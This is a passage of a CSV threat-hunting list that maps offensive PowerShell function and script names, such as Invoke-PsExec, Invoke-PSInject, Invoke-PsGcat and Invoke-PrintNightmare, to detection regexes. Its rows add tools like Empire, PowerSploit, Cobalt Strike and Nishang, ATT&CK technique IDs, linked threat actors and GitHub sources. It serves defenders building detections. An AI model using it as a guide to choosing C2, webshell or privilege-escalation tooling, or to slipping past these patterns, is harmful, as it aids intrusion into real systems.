"*Invoke-Printnightmare.ps1*",".{0,1000}Invoke\-Printnightmare\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49355" "*Invoke-PrintNightmareCheck*",".{0,1000}Invoke\-PrintNightmareCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49356" 
"*Invoke-Privesc*",".{0,1000}Invoke\-Privesc.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","49357" "*Invoke-Privesc*",".{0,1000}Invoke\-Privesc.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49358" "*Invoke-PrivescAudit *",".{0,1000}Invoke\-PrivescAudit\s.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","49359" "*Invoke-PrivescAudit*",".{0,1000}Invoke\-PrivescAudit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49360" "*Invoke-PrivescCheck*",".{0,1000}Invoke\-PrivescCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49361" "*Invoke-PrivescCheck*",".{0,1000}Invoke\-PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49362" "*Invoke-PrivescCheck.ps1*",".{0,1000}Invoke\-PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft 
Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49363" "*invokeprocesshunter*",".{0,1000}invokeprocesshunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49364" 
"*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49365" "*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49366" "*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49367" "*invoke-processhunter*",".{0,1000}invoke\-processhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","49368" "*Invoke-ProcessKiller*",".{0,1000}Invoke\-ProcessKiller.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49369" "*Invoke-ProcessPunisher*",".{0,1000}Invoke\-ProcessPunisher.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49370" "*Invoke-ProcessScan*",".{0,1000}Invoke\-ProcessScan.{0,1000}","offensive_tool_keyword","Invoke-ProcessScan","This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.","T1059.001 - T1016 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/vysecurity/Invoke-ProcessScan","1","1","N/A","N/A","N/A","1","45","19","2017-06-05T12:19:25Z","2017-06-03T18:36:30Z","49371" "*Invoke-ProcSpawn -Command *",".{0,1000}Invoke\-ProcSpawn\s\-Command\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49372" "*Invoke-ProcSpawn*",".{0,1000}Invoke\-ProcSpawn.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49373" "*InvokePS1.bat*",".{0,1000}InvokePS1\.bat.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","49374" "*Invoke-ps2exe*",".{0,1000}Invoke\-ps2exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","49375" "*Invoke-PSAmsiScan*",".{0,1000}Invoke\-PSAmsiScan.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","49376" "*Invoke-PsExec*",".{0,1000}Invoke\-PsExec.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49377" 
"*Invoke-PSexec.ps1*",".{0,1000}Invoke\-PSexec\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49378" "*Invoke-PsExec.ps1*",".{0,1000}Invoke\-PsExec\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - 
FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49379" "*Invoke-PsExecCmd*",".{0,1000}Invoke\-PsExecCmd.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49380" "*invoke-psexecpayload*",".{0,1000}invoke\-psexecpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49381" "*Invoke-PsGcat*",".{0,1000}Invoke\-PsGcat.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49382" "*Invoke-PSGcat.ps1*",".{0,1000}Invoke\-PSGcat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49383" "*Invoke-PsGcat.ps1*",".{0,1000}Invoke\-PsGcat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49384" "*Invoke-PsGcatAgent*",".{0,1000}Invoke\-PsGcatAgent.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49385" "*Invoke-PsGcatAgent.ps1*",".{0,1000}Invoke\-PsGcatAgent\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49386" "*Invoke-PSImage*",".{0,1000}Invoke\-PSImage.{0,1000}","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027.003 - T1027..009 - T1218 - T1216 - T1059","TA0005","N/A","Sandworm Team","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","1","N/A","N/A","7","10","2176","399","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z","49387" "*Invoke-PSInject*",".{0,1000}Invoke\-PSInject.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - 